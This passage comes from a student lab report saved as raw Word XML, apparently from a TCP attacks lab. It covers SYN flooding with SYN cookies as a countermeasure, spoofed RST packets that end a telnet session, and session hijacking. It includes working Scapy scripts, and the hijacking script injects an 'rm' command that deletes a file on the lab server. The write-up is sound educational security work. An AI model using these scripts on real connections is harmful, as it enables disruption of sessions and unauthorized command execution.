    <w:p w14:paraId="7C5F18B0" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">                            sizeof(struct ipheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674311A8" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="13094A0D" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   int tcp_len = ntohs(ip-&gt;iph_len) - sizeof(struct ipheader);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666A9D67" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="2325599A" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   /* pseudo tcp header for the checksum computation */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEB32F9" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   struct pseudo_tcp p_tcp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0F65FA" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   memset(&amp;p_tcp, 0x0, sizeof(struct pseudo_tcp));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C81AD6" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="78BA569C" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   p_tcp.saddr  = ip-&gt;iph_sourceip.s_addr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F999AD5" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   p_tcp.daddr  = ip-&gt;iph_destip.s_addr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D5901B" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   p_tcp.mbz    = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36063486" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   p_tcp.ptcl   = IPPROTO_TCP;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2719D4EB" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   p_tcp.tcpl   = htons(tcp_len);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250A05DA" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   memcpy(&amp;p_tcp.tcp, tcp, tcp_len);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8F44CE" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="6F4F46AF" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">   return  (unsigned short) in_cksum((unsigned short *)&amp;p_tcp,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F579C16" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">                                     tcp_len + 12);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0BE336" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FB3978" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="003F57BE"/>
    <w:p w14:paraId="0963F0BF" w14:textId="7C4266F6" w:rsidR="003F57BE" w:rsidRDefault="003F57BE" w:rsidP="003F57BE">
      <w:r>
        <w:t>Restoring the queue to its original size and flushing the TCP cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A74F084" w14:textId="79EBA248" w:rsidR="003F57BE" w:rsidRDefault="003F57BE" w:rsidP="003F57BE">
      <w:r w:rsidRPr="003F57BE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FBDAB8D" wp14:editId="7065956E">
            <wp:extent cx="5943600" cy="831850"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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8758" w14:textId="4178C305" w:rsidR="003F57BE" w:rsidRDefault="003F57BE" w:rsidP="003F57BE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Compiling and running the script:</w:t>
      </w:r>
      <w:r w:rsidRPr="003F57BE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5064B00C" wp14:editId="6A30C433">
            <wp:extent cx="5943600" cy="1155700"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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AB01" w14:textId="4CDE2BB9" w:rsidR="0085123B" w:rsidRDefault="00575CCC" w:rsidP="001641A9">
      <w:r>
        <w:t>We can see that the queue is full:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02403592" w14:textId="4A1350BF" w:rsidR="00575CCC" w:rsidRDefault="00575CCC" w:rsidP="001641A9">
      <w:r w:rsidRPr="00575CCC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C4FF68C" wp14:editId="4E63146C">
            <wp:extent cx="5626100" cy="1453409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1996" cy="145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7D3C" w14:textId="3A8A5C6F" w:rsidR="00575CCC" w:rsidRDefault="00575CCC" w:rsidP="001641A9"/>
    <w:p w14:paraId="6908EEE8" w14:textId="6E3D41BE" w:rsidR="00575CCC" w:rsidRDefault="00575CCC" w:rsidP="001641A9">
      <w:r>
        <w:t>Finally, attack successful:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F101806" w14:textId="7DD8E70B" w:rsidR="00575CCC" w:rsidRDefault="00575CCC" w:rsidP="001641A9">
      <w:r w:rsidRPr="00575CCC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05249014" wp14:editId="2E0DBFCD">
            <wp:extent cx="5943600" cy="1506855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CB38" w14:textId="2709DA31" w:rsidR="00745A5A" w:rsidRDefault="00745A5A" w:rsidP="001641A9"/>
    <w:p w14:paraId="40046224" w14:textId="41923DC1" w:rsidR="00745A5A" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451779">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 1.3: Enable the SYN Cookie Countermeasure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2257EAD5" w14:textId="5CD109A5" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>This task asks us to repeat the attack with the SYN Cookie countermeasure enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6BD748" w14:textId="642BD996" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>Enabling the countermeasure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103799BF" w14:textId="01B6C164" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r w:rsidRPr="00451779">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3779EE02" wp14:editId="57E8D30E">
            <wp:extent cx="4921250" cy="1532633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6138" cy="15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8BDE" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>I was able to telnet into the server in both the scripts, python as well as C, which means the attack was unsuccessful and the countermeasure works.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B25BDF7" w14:textId="293C1B7B" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00451779">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27E378C2" wp14:editId="62170C34">
            <wp:extent cx="5943600" cy="2985770"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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0971" w14:textId="7D31D9A9" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="7C782FA4" w14:textId="29C8921A" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="0E99BC1A" w14:textId="3AD1DDF4" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="203CAF70" w14:textId="53230E57" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="02E9F15B" w14:textId="63DCEA0D" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="2D0BE532" w14:textId="3C646BEE" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="738D6F36" w14:textId="13F05E16" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="07562206" w14:textId="0E640438" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="2E028920" w14:textId="32534D9E" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="40D57AB1" w14:textId="58D0BF67" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="5B4BA9DC" w14:textId="00C035CA" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="68DC4A31" w14:textId="66172266" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="208F9E3D" w14:textId="40B65550" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="2DF3BF05" w14:textId="7AF3FE4D" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="7D6FC7DB" w14:textId="44530E60" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="415B4F6B" w14:textId="67028DD7" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="6808665E" w14:textId="2B96E498" w:rsidR="00451779" w:rsidRDefault="00991EFF" w:rsidP="00991EFF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005339E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Task 2: </w:t>
      </w:r>
      <w:r w:rsidR="005339E3" w:rsidRPr="005339E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>TCP RST Attacks on telnet Connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CC66AC" w14:textId="27E88802" w:rsidR="005339E3" w:rsidRDefault="005339E3" w:rsidP="005339E3">
      <w:r>
        <w:t>The RST bit (inside the TCP header) terminates the connection between two clients who are communicating over TCP. By spoofing an RST packet from A to B, we can break an existing connection between the clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB67757" w14:textId="29A6507A" w:rsidR="005339E3" w:rsidRDefault="005339E3" w:rsidP="005339E3">
      <w:r>
        <w:t>The important information that we need to construct the correct TCP header is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6A183B" w14:textId="03890B06" w:rsidR="005339E3" w:rsidRDefault="005339E3" w:rsidP="005339E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Source and destination IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B789C7A" w14:textId="6BE849CF" w:rsidR="005339E3" w:rsidRDefault="005339E3" w:rsidP="005339E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Source and destination port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49647A4B" w14:textId="2DF5CB7B" w:rsidR="005339E3" w:rsidRDefault="005339E3" w:rsidP="005339E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sequence number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498C06EC" w14:textId="326B8D7F" w:rsidR="005339E3" w:rsidRDefault="005339E3" w:rsidP="005339E3">
      <w:r>
        <w:t>To gain this information, I used the combination of tcpdump and wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63201DF9" w14:textId="202C4DC6" w:rsidR="005339E3" w:rsidRDefault="005339E3" w:rsidP="005339E3">
      <w:r>
        <w:t>Using tcpdump to capture traffic between the victim and client who are already communicating over telnet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C3EF09" w14:textId="1D5F81EC" w:rsidR="005339E3" w:rsidRDefault="005339E3" w:rsidP="005339E3">
      <w:r w:rsidRPr="005339E3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11FF52FB" wp14:editId="07AB3CCB">
            <wp:extent cx="5943600" cy="9798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085B" w14:textId="3EA28181" w:rsidR="005339E3" w:rsidRDefault="00815B31" w:rsidP="005339E3">
      <w:r>
        <w:t>Using wireshark, I analyzed the dump file to obtain the source port and sequence number:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093FF4AB" w14:textId="1F2684C4" w:rsidR="00815B31" w:rsidRDefault="00815B31" w:rsidP="005339E3">
      <w:r w:rsidRPr="00815B31">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23C008C7" wp14:editId="49215316">
            <wp:extent cx="5943600" cy="1426210"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="17" name="Picture 1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o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90C2" w14:textId="1E7D3D79" w:rsidR="005339E3" w:rsidRDefault="005339E3" w:rsidP="005339E3">
      <w:r>
        <w:t>Source Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FAB45F" w14:textId="77777777" w:rsidR="00815B31" w:rsidRDefault="00815B31" w:rsidP="00815B31">
      <w:r>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E66107" w14:textId="77777777" w:rsidR="00815B31" w:rsidRDefault="00815B31" w:rsidP="00815B31">
      <w:r>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05250C15" w14:textId="77777777" w:rsidR="00815B31" w:rsidRDefault="00815B31" w:rsidP="00815B31"/>
    <w:p w14:paraId="794D407E" w14:textId="77777777" w:rsidR="00815B31" w:rsidRDefault="00815B31" w:rsidP="00815B31">
      <w:r>
        <w:t>ip  = IP(src="10.9.0.6", dst="10.9.0.5")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B00AD3" w14:textId="77777777" w:rsidR="00815B31" w:rsidRDefault="00815B31" w:rsidP="00815B31">
      <w:r>
        <w:t>tcp = TCP(sport=36996, dport=23, flags="R", seq=3298234620)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339C0D9B" w14:textId="77777777" w:rsidR="00815B31" w:rsidRDefault="00815B31" w:rsidP="00815B31">
      <w:r>
        <w:t>pkt = ip/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C2BBB1" w14:textId="77777777" w:rsidR="00815B31" w:rsidRDefault="00815B31" w:rsidP="00815B31">
      <w:r>
        <w:t>ls(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA73A9C" w14:textId="77777777" w:rsidR="00815B31" w:rsidRDefault="00815B31" w:rsidP="00815B31">
      <w:r>
        <w:t>send(pkt, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AC1390" w14:textId="535AAB87" w:rsidR="00815B31" w:rsidRDefault="00815B31" w:rsidP="005339E3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sending the attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58733AB3" w14:textId="0A54356B" w:rsidR="00815B31" w:rsidRDefault="00815B31" w:rsidP="005339E3">
      <w:r w:rsidRPr="00815B31">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A848970" wp14:editId="4AED3D44">
            <wp:extent cx="4251170" cy="3022600"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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3531" cy="302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09EF" w14:textId="73C909CE" w:rsidR="00815B31" w:rsidRDefault="00815B31" w:rsidP="005339E3">
      <w:r>
        <w:t>And finally, attack successful:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028A119C" w14:textId="5F49C635" w:rsidR="00815B31" w:rsidRDefault="00815B31" w:rsidP="005339E3">
      <w:r w:rsidRPr="00815B31">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42324A87" wp14:editId="3AD02C8C">
            <wp:extent cx="4270385" cy="349250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2597" cy="349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C6CE" w14:textId="0BE8A7BA" w:rsidR="00815B31" w:rsidRDefault="00815B31" w:rsidP="005339E3"/>
    <w:p w14:paraId="77774AB5" w14:textId="3679EE2D" w:rsidR="00815B31" w:rsidRDefault="00815B31" w:rsidP="005339E3"/>
    <w:p w14:paraId="7EB307E4" w14:textId="3542A3F9" w:rsidR="00815B31" w:rsidRDefault="00815B31" w:rsidP="005339E3"/>
    <w:p w14:paraId="589961E5" w14:textId="06F43E40" w:rsidR="00815B31" w:rsidRDefault="00815B31" w:rsidP="00815B31">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815B31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 3: TCP Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F91A806" w14:textId="6F357C6B" w:rsidR="005339E3" w:rsidRDefault="00815B31" w:rsidP="005339E3">
      <w:r>
        <w:t xml:space="preserve">The objective of this attack is to hijack an existing TCP connection and inject malicious </w:t>
      </w:r>
      <w:r w:rsidR="00B331C3">
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> into the session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524957F8" w14:textId="1B57ED36" w:rsidR="00B331C3" w:rsidRDefault="00B331C3" w:rsidP="00B331C3">
      <w:r>
        <w:t>For this attack, we need the following information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1733DE67" w14:textId="4741AE4D" w:rsidR="00B331C3" w:rsidRDefault="00B331C3" w:rsidP="00B331C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Source and destination IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC8AC78" w14:textId="5623DBF3" w:rsidR="00B331C3" w:rsidRDefault="00B331C3" w:rsidP="00B331C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Source and destination port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B9E8C5" w14:textId="748009F0" w:rsidR="00B331C3" w:rsidRDefault="00214161" w:rsidP="00B331C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sequence number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0A338C" w14:textId="21E260C9" w:rsidR="00214161" w:rsidRDefault="00214161" w:rsidP="00B331C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Acknowledgement number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A7C5AE" w14:textId="6762C355" w:rsidR="00214161" w:rsidRDefault="008672D3" w:rsidP="00214161">
      <w:r>
        <w:t>First, I started a telnet session from user1 to the victim and created a file on the server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EC9308" w14:textId="48307074" w:rsidR="008672D3" w:rsidRDefault="008672D3" w:rsidP="00214161">
      <w:r w:rsidRPr="008672D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3111789F" wp14:editId="24C8D8C3">
            <wp:extent cx="3794292" cy="304800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7186" cy="305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F64F" w14:textId="4DC3D0C7" w:rsidR="008672D3" w:rsidRDefault="008672D3" w:rsidP="00214161">
      <w:r>
        <w:t>Confirmation that the file was created on the server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2D3B15" w14:textId="5268A92E" w:rsidR="008672D3" w:rsidRDefault="008672D3" w:rsidP="00214161">
      <w:r w:rsidRPr="008672D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08A65CB3" wp14:editId="105CDE64">
            <wp:extent cx="5943600" cy="1803400"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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9ADD" w14:textId="77777777" w:rsidR="008672D3" w:rsidRDefault="008672D3" w:rsidP="00214161"/>
    <w:p w14:paraId="71442C1D" w14:textId="77777777" w:rsidR="008672D3" w:rsidRDefault="008672D3" w:rsidP="00214161"/>
    <w:p w14:paraId="579346F3" w14:textId="4A31BD9E" w:rsidR="008672D3" w:rsidRDefault="008672D3" w:rsidP="00214161">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>While this session was active, I also created a dump of the traffic between victim and user1 using tcpdump:</w:t>
      </w:r>
      <w:r w:rsidRPr="008672D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1010FE" w14:textId="195DB5DC" w:rsidR="008672D3" w:rsidRDefault="008672D3" w:rsidP="00214161">
      <w:r w:rsidRPr="008672D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CC1FBDC" wp14:editId="227EB55D">
            <wp:extent cx="5943600" cy="905510"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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7983" w14:textId="36B04F4E" w:rsidR="008672D3" w:rsidRDefault="008672D3" w:rsidP="00214161">
      <w:r>
        <w:t>Analyzing this dump using wireshark to obtain the necessary information</w:t>
      </w:r>
      <w:r w:rsidR="007E6110">
        <w:t xml:space="preserve"> to construct the TCP header</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E83FD94" w14:textId="5957C1AE" w:rsidR="008672D3" w:rsidRDefault="008672D3" w:rsidP="00214161">
      <w:r w:rsidRPr="008672D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42D742D0" wp14:editId="6521B633">
            <wp:extent cx="4673600" cy="3540152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8897" cy="354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F313" w14:textId="6F7FD52C" w:rsidR="007E6110" w:rsidRDefault="007E6110" w:rsidP="00214161"/>
    <w:p w14:paraId="75F6B889" w14:textId="7CC20795" w:rsidR="007E6110" w:rsidRDefault="007E6110" w:rsidP="00214161">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E6110">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Source Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3D3716" w14:textId="77777777" w:rsidR="007E6110" w:rsidRPr="007E6110" w:rsidRDefault="007E6110" w:rsidP="007E6110">
      <w:r w:rsidRPr="007E6110">
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493DD78C" w14:textId="5601BE9C" w:rsidR="007E6110" w:rsidRPr="007E6110" w:rsidRDefault="007E6110" w:rsidP="007E6110">
      <w:r w:rsidRPr="007E6110">
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6482FE28" w14:textId="77777777" w:rsidR="007E6110" w:rsidRPr="007E6110" w:rsidRDefault="007E6110" w:rsidP="007E6110">
      <w:r w:rsidRPr="007E6110">
        <w:t>ip  = IP(src="10.9.0.6", dst="10.9.0.5")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105D3EBE" w14:textId="77777777" w:rsidR="007E6110" w:rsidRPr="007E6110" w:rsidRDefault="007E6110" w:rsidP="007E6110">
      <w:r w:rsidRPr="007E6110">
        <w:t>tcp = TCP(sport=56116, dport=23, flags="A", seq=2358863967, ack=3352341360)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643CBC50" w14:textId="77777777" w:rsidR="007E6110" w:rsidRPr="007E6110" w:rsidRDefault="007E6110" w:rsidP="007E6110">
      <w:r w:rsidRPr="007E6110">
        <w:t>data = "\nrm /home/seed/imp_file\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0911393C" w14:textId="77777777" w:rsidR="007E6110" w:rsidRPr="007E6110" w:rsidRDefault="007E6110" w:rsidP="007E6110">
      <w:r w:rsidRPr="007E6110">
        <w:t>pkt = ip/tcp/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CD630C" w14:textId="77777777" w:rsidR="007E6110" w:rsidRPr="007E6110" w:rsidRDefault="007E6110" w:rsidP="007E6110">
      <w:r w:rsidRPr="007E6110">
        <w:t>ls(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA9E075" w14:textId="1BFA521F" w:rsidR="007E6110" w:rsidRDefault="007E6110" w:rsidP="007E6110">
      <w:r w:rsidRPr="007E6110">
        <w:t>send(pkt, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2D34DE" w14:textId="659F46FD" w:rsidR="007E6110" w:rsidRDefault="007E6110" w:rsidP="007E6110">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Using my source code, I deleted this file by injecting the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">rm </w:t>
      </w:r>
      <w:r>
        <w:t>command as seen in the source code above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABB100A" w14:textId="04E850EF" w:rsidR="007E6110" w:rsidRDefault="007E6110" w:rsidP="007E6110">
      <w:r>
        <w:t>Sending the malicious packet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F75A66E" w14:textId="22001BB2" w:rsidR="007E6110" w:rsidRDefault="007E6110" w:rsidP="007E6110">
      <w:r w:rsidRPr="007E6110">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D10B916" wp14:editId="5F32269C">
            <wp:extent cx="4345764" cy="3143250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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0704" cy="314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3A27" w14:textId="5D139432" w:rsidR="007E6110" w:rsidRDefault="007E6110" w:rsidP="007E6110">
      <w:r>
        <w:t>We can see that the file is gone:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53292166" w14:textId="1F998DF3" w:rsidR="007E6110" w:rsidRDefault="007E6110" w:rsidP="007E6110">
      <w:r w:rsidRPr="007E6110">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3082DB8D" wp14:editId="2CE2D656">
            <wp:extent cx="5943600" cy="2065655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65BD" w14:textId="2836E1EC" w:rsidR="007E6110" w:rsidRDefault="007E6110" w:rsidP="007E6110"/>
    <w:p w14:paraId="5C85E18A" w14:textId="172A5DED" w:rsidR="007E6110" w:rsidRDefault="007E6110" w:rsidP="007E6110"/>
    <w:p w14:paraId="4F620B10" w14:textId="7F4F46F7" w:rsidR="007E6110" w:rsidRDefault="007E6110" w:rsidP="007E6110"/>
